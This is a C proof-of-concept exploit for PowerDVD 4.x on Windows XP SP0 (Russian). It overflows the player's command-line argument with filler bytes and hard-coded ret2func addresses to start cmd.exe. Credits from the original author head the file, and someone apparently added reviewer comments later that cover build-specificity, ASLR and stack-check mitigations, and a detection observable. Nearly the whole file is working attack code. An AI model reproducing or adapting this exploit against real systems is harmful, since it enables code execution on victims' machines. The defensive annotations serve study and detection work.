PowerDVD 4.x local win32 exploit.
9ca71090ce171097c92df0d5c8162aa3c10c60119af5ced564dec9414ab90a9e
/*
\ PowerDVD <= 4.? local win32 exploit
/ exploited by darkeagle, discovered by darkeagle
\
/ PoC exploit runs cmd.exe on WinXP SP0 Rus
\ Using ret2func technique :)
/
\ greetz: unl0ckerz { nekd0, xtix, crash-x, choix, antiq, 8ron, 0xdeadbabe }, CoKi, rave etc.
/
\ mailto: darkeagle [at] unl0ck [dot] org
/ darkeagle [at] linkin-park [dot] cc
\ http://unl0ck.org
/
\
*/
#include <stdio.h>
#include <string.h>
#include <windows.h>
/*
 * Proof-of-concept driver: assembles one over-long command line and passes it
 * to system(), so the program named by argv[1] is started with a crafted
 * argument appended after its path.
 *
 * argv[1] - path of the executable to launch (the usage text calls it <path>).
 * Every path through the function ends in exit(0), including the
 * missing-argument case, so the exit status carries no information.
 *
 * Reviewer notes (defensive reading):
 *  - The file header describes a "ret2func" PoC that starts cmd.exe on
 *    WinXP SP0 Rus. The three 4-byte values appended below are hard-coded;
 *    presumably they are addresses valid only on that build, which would make
 *    the PoC build-specific -- not verifiable from this file.
 *  - Fixed-address return overwrites of this kind are what module base
 *    randomisation (ASLR) and compiler stack checks are designed to break;
 *    the page does not say which of these the affected versions had.
 *  - Nothing on the page shows the target running with more privilege than
 *    the user who launches it, so treat the "local" impact as unconfirmed.
 *  - Observable for detection: a media-player process started with an
 *    argument several hundred bytes long containing non-printable bytes, or
 *    that process spawning a command shell.
 */
int main(int argc, char *argv[])
{
/* Command line under construction; the array is not initialised. */
char cmd[500];
char *path;
printf("\n\n* PowerDVD <= 4.0 local exploit *\n\tby darkeagle\n\nusage: pdvdx.exe <path>\n\n");
if ( argc < 2 ) { printf(" need an argument!\n"); exit(0); }
path = argv[1];
/*
 * Unbounded copy of the caller-supplied path plus one space.
 * NOTE(review): 500 - (1 + 12 + 299) leaves 188 bytes for the path; a longer
 * argv[1] makes the writes below run past the end of cmd in this program.
 */
sprintf(cmd, "%s ", path);
/* Three hard-coded 4-byte sequences appended raw, 12 bytes in total. */
strcat(cmd, "\x44\x80\xC1\x77");
strcat(cmd, "\xDC\x7A\xC2\x77");
strcat(cmd, "\x35\x13\xC0\x77");
/*
 * Writes 299 bytes of 0x55 starting at the current terminator, which is
 * overwritten; no new terminator is stored.
 * NOTE(review): the rest of cmd is uninitialised, so where the string ends
 * when system() reads it is not defined by this code.
 */
memset(cmd+strlen(cmd), 0x55, 299);
/* Hands the assembled line to the command interpreter; the result is ignored. */
system(cmd);
exit(0);
}